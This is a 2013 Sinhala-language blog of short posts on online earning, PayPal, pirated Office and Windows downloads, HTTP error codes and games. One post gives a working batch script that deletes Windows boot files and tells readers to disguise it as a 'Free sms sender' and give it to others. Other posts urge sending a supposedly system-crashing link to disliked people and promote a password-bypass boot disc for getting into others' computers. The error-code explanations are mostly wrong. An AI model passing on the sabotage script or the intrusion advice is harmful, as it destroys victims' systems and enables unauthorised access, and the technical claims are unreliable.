by Unknown | 
in
ඊ මනී
at Tuesday, April 30, 2013
මම අද ගෙනාවෙ බර ගානක් $$$$ හොයාගන්න විදිහක්.ගොඩක් කට්ටිය ඉ මනී කරනවා.සමහරුන් එක එක සයිට් වල ඉ මනී කරන්නට ගිහින් ඔක්කොම ඔම්ලට් කරගෙන ඉන්නවා.එහෙම අයටයි මේ..තමන්ගෙ උත්සාහය හා කැපවීම මත මසකට අති විශාල අදායමක් ඉපයීමට අති සාර්තක ක්රමයකි Data entry.අන්තර්ජාලය තුල Data entry කිරීමට පැය ගනනට ගෙවීමේ පදනම මත හෝ කොන්ත්‍රාත්තු ආකාරයට රැකියාවේ නිරත විය හැක.පැය ගනනට කරන්නේනම් online සිට කෙරිය යුතුයි.
Data entry කිරීමට අවශ්‍යය සුදුසුකම්
*තරමක් දුරට හොද ඉන්ගිරීසි දැනුමක්
*ඊමේල්,ඉන්ටනෙට් හා පරිගනකය බාවිතය පිලිබදව දැනුමක්
*හොද උනන්දුවක් හා කැපවීමක්
*තරමක් කපටිකමක්(තිබුනොත් වාසියි)
*දවසකට part time/full time ලෙස වැඩ කිරීමේ හැකියාව
මටනම් Data entry එපාම උනා. හා හා පුරා කියල Odex වලට පයගහලා බාරදීපු පලවෙනි වැඩේ පොඩ්ඩක් ඇනිලා මට සුද්දෙක් මරුවට බැන්නා.පොඩ්ඩක් කපට්කම වැඩි වෙලා.ඔයාලත් ගානට වැඩිය කපටිකම තියාගන්න එපා.මම බාරගත්තෙ Logo එකක් හදන්න.කොහොමහරි සුද්ද මට බැනල බැනල 3$ක් දීල තිබුනා.මගෙ පලවෙනි පඩිය නිසා අවුලක් නෑ,අවුලක් නැත්තෙමත් නෑ..ආයෙ ඕන උනොත් අයෙත් ගොඩවැදිල බලනවා.
ඔබට අන්තර්ජාල පහසුකම නොමැතිනම් cafe එකක් වෙතට ගොස් කොන්ත්‍රාත්තුවක් බාරගෙන එය නිම කර නැවත cafe එකක් වෙතට ගොස් කාර්යය බාරදී තම ගනු දෙනු කටයුතු කල හැකිය.
මෙහිදී ඔබේ මහන්සියෙන් උපයාගත් මුදල් එම ආයතනය මගින් නිකුත් කරන Debit master card එක හරහා ඔබට ලබා ගත හැක.එම කාඩ් පත මගින් ඕනෑම බැන්කුවකින් ATM යන්ත්‍රයකින් මුදල් ලබාගත හැක.
ඔබට ලැබෙන මුදල තීරනය වන්නේ ඔබ කරන රැකියාව අනුවයි.උදාහරනයක් ලෙස.Data entry කරන කෙනෙකුට පැයකට ලබාගන්නා මුදලට වඩා වැඩි මුදලක් Graphic Designing කරන අයෙකු උපයයි.නමුත් ඊට වඩා වැඩි මුදලක් Programming කරන පුද්ගලයෙකු උපයනු ලබයි.මීට අමතරව විනාඩියකට ටයිප් කරන වචන ප්‍රමානයද,ඒවායේ වචන වල නිවැරදිතාව මෙන්ම ගුනාත්මකතාව යන සාදක මත තමන්ට ලැබෙන මුදල රදා පවතී.මෙහි ඇති රැකියා තුලින් Type settings,Article writing,Word,Excel,Accounting,Graphic designe,Java programming කිහිපයකි.
සාමාන්යෙන් ලොගෝ එකක් නිර්මානය කිරීමට 5$ සිට ගෙවනු ලබයි.දියුනු වීමේ හොදම මාර්ගය Data entry කිවහොත් නිවැරදියි.
කොන්ත්‍රාත් ආකාරයට වැඩකරන්නේනම් ඔබට කාර්යය කිරීමට පෙර කිසියම් අත්තිකාරම් මුදලක් ලබාගත හැක.එමෙන්ම තමන් බාරගත් කාර්යය නිම කර බාරදීමට කිසියම් කාලයක් ලබාදෙයි.එම කාලය ප්‍රමානවත් නොවේනම් ඔබට එහි ඇති Message centre මගින් කතාකර අවශය කාලය ඉල්ලා ගත හැක.එමෙන්ම තමන් බාර දුන් වැඩේ කිසියම් වැරැද්දක් ඇතොත් එය Message centre වෙතට දන්වයි.එය නිවැරදි කර නැවත ලබා දිය හැක.වැරැද්ද තමන්ට නිවැරදි කරන්න නොහැකි උනොත් ඔබගේ මුදලෙන් අඩු කර ගනී.(ඒවනම් කැත වැඩ//\\මට උන වැඩේ).තමන් බාරගත් කාර්යය email ආකාරයට ලැබෙන අතර.නිම කල වැඩ email ආකරයෙන් යැවිය හැක.
Data entry කරන්න ගොඩක් ජනප්‍රිය සයිට් තමා මේවා Odex, Freelancer.ඒවත් සමග වැඩ කරන්නෙ කොහොමද කියලා ඔයාලට කියල දෙන්නම් තවත් ලිපි කිහිපයකින්..
Data entry ගැන අවබෝදයක් ලැබෙන්න ඇති කියලා හිතෙනවා.Data entry වලට
ප්‍රසිද්ද ආයතන ගැන පස්සේ කියන්නම්කෝ...අම්මෝ මගෙ ඔලුවත් රිදෙනවා.ඇති
හොදේ.
by Unknown | 
in
ඊ මනී
at Tuesday, April 30, 2013
අද කට්ටියට කියල දෙන්න යන්නෙ ගොඩක් ප්‍රයෝජනවත් දෙයක් ගැන.එහෙනම් මොකක්ද කියල සද්ද නැතිව කියවලා බලන්නකෝ..
අපගෙ එදිනෙදා ජීවිතයේදී අපගෙ මුදල් ආරක්ශා කරගන්නයි,උපයන මුදල් රැස් කරගැනීමටයි අපි බැන්කු පාවිච්චි කරනවනේ. අපි අන්තර්ජාලයේ උපයන මුදල් ආරක්ශිතව රැස්කර තබා ගැනීමටනම් අපට ගිනුමක් අවශය වෙනවා.ඒ සදහා දැනට ලෝකයෙ වැඩිම පිරිසක් බාවිතා කරන්නෙ paypal. paypal online මුදල් හුවමාරු සේවාවන් අතරෙන් ජනප්‍රියම සේවාවකි.
අන්තර්ජාලය මගින් බාන්ඩ මිලදී ගැනීමටත්,මුදල් හුවමාරු කිරීමටත්,මුදල් ආරක්ශාකාරීව තබා ගැනීමටත් paypal බාවිතා කරන්න පුලුවන්.
ගෙවීම් ලබාගැනීම සඳහා paypal සේවාවේ ගිණුමක් තිබීම අත්‍යවශ්‍ය වුවද ගෙවීම් කිරීම සඳහා එවැනි ගිණුමක් අත්‍යවශ්‍ය නොවන නිසා විද්‍යුත් ණය හෝ හර පතක් (Credit or Debit Card)ඇති ඕනෑම කෙනෙකුට paypal ගිණුමක් වෙත මුදල් යොමු කිරීමට හැකි වීම එය ප්‍රමුඛතම මුදල් හුවමාරු සේවාව බවට පත් කරයි.
add click jobs සහා mini jobs වැනි අන්තර්ජාල රැකියා මගින් උපයන මුදල් මෙමෙ ගිනුමේ තැම්පත් කල හැක.
දැනටමත් ඔයාට සැකයක් නැතිවම paypal ගිනුමක් ඇති.paypal එකක් නැති අයත් ඉන්න නිසා එයාලටයි මේ පෝස්ට් එක දැම්මේ.
paypal ගිනුමක් ඔයාට හදාගන්න ඔනේනම් මෙතනට ගිහින් Register වෙන්න.ඔයා ඇතුලත් කරන තොරතුරු ඇත්ත වෙන්න ඕනෙ.(අපෙ අයියලගෙ හැටි දන්න නිසයි කිවුවෙ).
by Unknown | 
in
බාගන්න
at Monday, April 29, 2013
කොහොමද යාලුවනේ අද මම ඇරගෙන ආවෙ අවුරුදු 3ක් පරන දෙයක්.හැබැයි ඒක ගොඩක් පරන උනත් ඒක බොහෝම ප්‍රචලිතයි. ගොඩක් අය හොයන නිසා මට හිතුන ඒක ලබාදෙන්න. මෙක crack එකත් එක්ක තියෙන්නේ.අවශය අය ඉන්නවනම් බාගන්න.
product key
INSTRUCTIONS
1. Open the folder Office 2010.
2. Run Professional Plus, and install or upgrade.
3. If you cannot upgrade then desintall the previous version of office.
4. Use the legit product key when asked.
4. enjoy your free Microsoft Office 2010 Pro Plus
by Unknown | 
in
බ්ලොග් වැඩ
at Thursday, April 25, 2013
by Unknown | 
in
දැනුමට යමක්
at Wednesday, April 24, 2013
ආ කෝමෙයි.අදනම් ටිකක් අමාරුයි.අවුරුදු උත්සවයක් තිබුනා.අද මම කට්ටියට කියන්න හදන්නෙ හැමෝටම කරදරකාර ERRO මැසේජ් ඇවිල්ලා ඇතිනේ.ඒ ERRO මැසේජ් ගැන ටිකක් දැනුවත් කරන්නයි අවේ..එහෙනම් හොද ලමයි වගේ අහගෙන ඉන්නකෝ
400 Bad request
මේකෙන් කියන්නේ අන්තර්ජාලයෙන් පරිශීලකයා ඉල්ලපු වෙබ් අඩවිය අන්තර්ජාලයේ නොමැති බවයි.මෙහෙම මැසේජ් එකක් ආවොත් type කරපු වෙබ් ලිපිනය නිවැරදිද කියල බලන්න.හරී.....
401 Unauthorized
මේකෙන් කියන්නේ පරිශීලකයා ඇතුලත් කල වෙබ් ලිපිනයට ඇතුල්වීමට අවසරයක් නොමැති බවයි.මෙවාට ඇතුලු විය හැක්කේ පරිශීලකයාගේ තොරතුරු එනම් යූසර් නේම් සහා පාස්වර්ඩ් ඇතුලත් කිරීමෙනි.
403 Forbidden
මෙයින්ද අදහස් කරන්නේ වෙබ් ලිපිනයට ඇතුලු විය නොහැකි බවයි.ඇතුලු වීමටනම් ලියාපදින්චි වී අවසර ලබා ගත යුතුයි.
404 Page not found
මෙයින් කියවෙන්නේ පරිශීලකයාට ලබා ගැනීමට අවශය වෙබ් ලිපිනය සම්බන්ද කිරීමේ යම් තාක්ශනික අපහසුතාවක් පිලිබදවයි.මෙහිදී කලයුත්තේ වෙබ් පිටුව රීෆෙශ් කිරීම හෝ කලින් පිටුවට ගොස් නැවත එම පිටුව වෙත් පැමිනීමයි.එමෙන්ම එම අඩවියේ ඇතැම් දෝශයන් නිසාද මෙවැනි මැසේජ් දිස්වේ
408 Request time out
මෙයින් කියවෙන්නේ පරිශීලකයා යම් වෙබ් ලිපිනයක් ක්ලික් කිරීමේදී සිදුවන යම් ප්‍රමාද දෝශයකි.මෙවැනි අවස්තාවකදී ක්ශනික ක්ලික් එකක් කරලා බලන්න
500 Server not found
මෙවැනි මැසේජ් එන්නේ අන්තර්ජාලයේ සර්වර් වල යම් දෝශයන් නිසාය.මෙවැනි අවස්තාවකදී කල යුත්තේ මද වේලාවක් සිට නැවත එම වෙබ් ලිපිනයට සම්බන්ද වීමයි
502 Server overload
මෙයින් කියවෙන්නේ අන්තර්ජාලයේ සර්වර් කාර්ය බහුල වීමයි.මෙවැනි අවස්තාවක මද වේලාවක් සිට සම්බන්ද විය යුතුය
503 Service unavailable
මෙයින් කියවෙන්නේ ඉන්ටනෙට් සේවාව සපයන්නාගේ ඇති වරදක් හෝ සේවාව ක්‍රියා විරහිත වීමකි.එවැනි අවස්තාවක කල යුත්තේ ඉන්ටනෙට් සේවාව සපයන ආයතන වෙත දැන්වීමයි.
යමක් දැනගත්තනම් ඒක මට සතුටක්.තවත් සතුටු හිතෙයි කමේන්ටුවක් එහෙම දාලා ගියානම්......
by Unknown | 
in
ෆන් වැඩ
at Sunday, April 21, 2013
මෙන්න තවත් සුපිරි කැත වැඩක්.මම කැත පොරක්නම් නෙවේ හැබැයි. මේකෙන් වෙන්නෙ පරිගනකය සදහටම දොයි කිරීමයි.පන්ඩිත්යො ඉන්නවනම් මේක දීලා බලන්න.එයාට බඩු හරි.
මේ පහල තියෙන text එක notepad එකට පේස්ට් කරලා අගට .bat කියන format එකින් සේව් කරන්න.
ex:- Free sms sender.bat
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
හුටා..අමතක උනා.කෝඩ් එක කොපි කරන්න බෑ නේද.මෙතනින් බාගන්න එහෙනම්
මේකෙ icon එක එහෙම වෙනස් කරලා කාටහරි දෙන්න තමා තියෙන්නේ..
මේකෙන් වෙන්න පරිගනකයක් boot වෙන්න ඕන file මකලා දමන එකයි.එතකොට restart වෙවේ තියෙයි.අපිට මොකද..
වැරදිලාවත් ඔයාගෙ අතින් උනොත් නැට්ට පාගගත්තා වගේ තියෙයි. අපිනම් දන් නෑ ඔන්න.
by Unknown | 
in
ෆන් වැඩ
at Sunday, April 21, 2013
තරහා කාරයෝ,පන්ඩිතයෝ එහෙම ඉන්නවද.එහෙනම් ලොකු කැත වැඩක් කරමු.පහල මම URL එකක් දීලා තියෙනවා..හෝ..හෝ..පොඩ්ඩක් ඉන්න යන්නනම් එපා ඕකට.ඕකට ගියොත් ඔයාට අබසරනයි.
Do not click !!!
http://tiny.cc/ibJUN
මෙහෙමයි සීන් එක මේ දීලා තියෙන URL එක උඩ click කලොත් නම් වැඩි වෙලා ඉන්න ලැබෙන් නෑ.වැඩිම උනොත් පැයයි.මුලු system එකම crash වෙනවා.ඔයාට කරන්න තියෙන්නෙ මේ URL එක කාටහරි දෙන එක විතරයි.ඒක අමාරු දෙයක් නෙවේනේ..මමනම් ඕකට ගිහින් බැලුවෙ නෑ.වෙලාවක පිස්සුවක් වගේ හැදුනොත් ගිහින් බලනවා..
බක පන්ඩිතයෝ ඉන්නවනම් වැඩේ දෙන්න.මොකද මටත් එහෙම එවුන් පේන්න බෑ.
ආයෙත් කියන්නම් ඔයානම් මේකට ගිහින් බලන්න එපා.මොනවරි වුනොත් මමනම් දන් නෑ..බයවුනාද
by Unknown | 
in
බාගන්න
at Friday, April 19, 2013
මම හිතුවා අද ඔයාලට පොඩි තෑග්ගක් දෙන්න ඕනේ කියලා.හැබැයි මේක ඇවිත් ගොඩක් කල් වෙනවා.තත්වය අතින් උසස් නිසා ගොඩක් අය පාවිච්චි කරන්නෙ windows 7.ඉතින් මම තිතුවා ඔයාලට ඕන විදිහට windows 7 බාගන්න අවස්තාව දෙන්න ඕනෙ කියලා.පහල කැමති එකකින් බාගන්න.ඔර්ජිනල් බඩු.
image එකක් විදිහට තියෙන්නේ.බාගෙන DVD එකකට write කරගන්න.
- Download Windows 7 Home Premium with Service Pack 1 (SP1) :
-
Download Windows 7 Professional with Service Pack 1 (SP1):
-
Download Windows 7 Ultimate with Service Pack 1 (SP1):
-
Windows 7 Ultimate English 64-bit - Click Here To Download
ප්‍රයෝජනවත් උනා කියලා හිතනවනම් කමේන්ටුවක් දාලා යන්න.මම ගියෝ..............
by Unknown | 
in
ෆන් වැඩ
at Monday, April 15, 2013
මුලින්ම කියන්න ඕනේ ඔයාලා සැමටම සුබම සුබ අලුත් අවුරුද්දක් වේවා කියලා...
අද ගෙනාවෙ කට්ටිය ආසා කරන දෙයක්.කට්ටිය කැමති ඇතිනේ අනුන්ගෙ කොම් වලට හොරෙන් රින්ගන්න.එහෙනම් මේ බාන්ඩෙ උදවු වෙයි.කරන්න තියෙන්නෙ සුලු දෙයයි.
CD-konboot-v1.1-2in1.iso
මේ බන්ඩෙ බාගන්න.මේක image file එකක්.ඒ image එක CD එකකට write කරගන්න.දැන් වැඩේ හරි.මේක බාවිතා කරන්නෙ මෙහෙමයි..
ඔයාට රින්ගන්න ඕන කොම් එක on කරන්න.
ඒකට පාස්වර්ඩ් එකක් දාලනම්.ඔයා write කරගත්තු CD එක rom එකට දාන්න.
දැන් කොම් එක restart කරන්න.
දැන් කොම් එක boot වෙන්නේ ඔයා දාපු CD එකෙන්.
දැන් password ගහන්න තියෙන තැනට මුකුත් නොගහා ඇතුල්වෙන්න..
වැඩේ හරි නේද..දැන් ඉතින් ඕන දෙයක් කරගන්න.
කොම් එකක පාස්වර්ඩ් එක අමතක උනාම මේක පාවිච්චි කරන්න පුලුවන්.සුපිරි බාන්ඩෙ නේද..අනන් මනන් කිවුවට මොකද බාන්ඩෙ බාගන්න ලින්ක් එකක් දුන් නෑනේ.ආ මෙතනට ගිහින් බාගන්න..
යාලුවනේ මේකත් නියම බාන්ඩයක්.මේකෙමුත් පුලුවන් වැඩේ කරන්න මෙතනට ගිහින් මේ බාන්ඩේ බාගන්න.
PC Login Password Remover.iso
අරකට වඩා වෙනස්.මේකත් සුපිරි බාන්ඩේ.කරලම බලන්න.එහෙනම් මම ගියා..කමේන්ටුවක් දාලම යන්නකෝ...
by Unknown | 
in
ෆන් වැඩ
at Wednesday, April 10, 2013
ඔන්න ගෙනාවා ෆන් වැඩක්.කට්ටිය ගේම් ගහන්න කැමති ඇතිනේ..කවුද අකමැති නේද...
මම කියන්න යන්නෙ ඔන්ලයින් ගේම් ගහන්න පුලුවන් වෙබ් අඩවියක් ගැන.මේ අඩවියේ ලක්ශ ගනන් ෆ්ලෑශ් ගේම්ස් තියෙනවා ඇති තරම්.ගොඩක් විනෝද වෙන්න පුලුවන්..මමත් සෙල්ලම් කරල තියෙනවා..ඔයා ගොඩක් කැමති සෙල්ලමක් තියෙනවනම් ඒක බාගන්නත් පුලුවන්.හැමදාම ඔන්ලයින් ගහන්නත් බෑනෙ.මොකද නිකන් අන්තර්ජන්ජාලෙ යනවැයි.
ලොකු,පොඩි,තඩි,කෙට්ටු,මහලු,කලු කාටත් හොදට විනෝද වෙන්න පුලුවන්.තමන් කැමති ඕන ගේමක් තියෙනවා..ඇති තරම් ගේම්ස් ගහන්න පුලුවන්..මහන්සි වෙලා වැඩ කරලා මේ වගෙ ගේම් එකක් ගැහුවම ලොකු සහනයක් දැනේවි,,
මරු මරු ගේම්ස් තියෙනවා ඔන්ලයින් ගන්න එහෙනම්.. මම ගියා..
කොහෙන්ද ගහන්නෙ කියන්න අමතක උනානෙ..මෙතනින් ගිහින් ගහන්න..(ගේම්)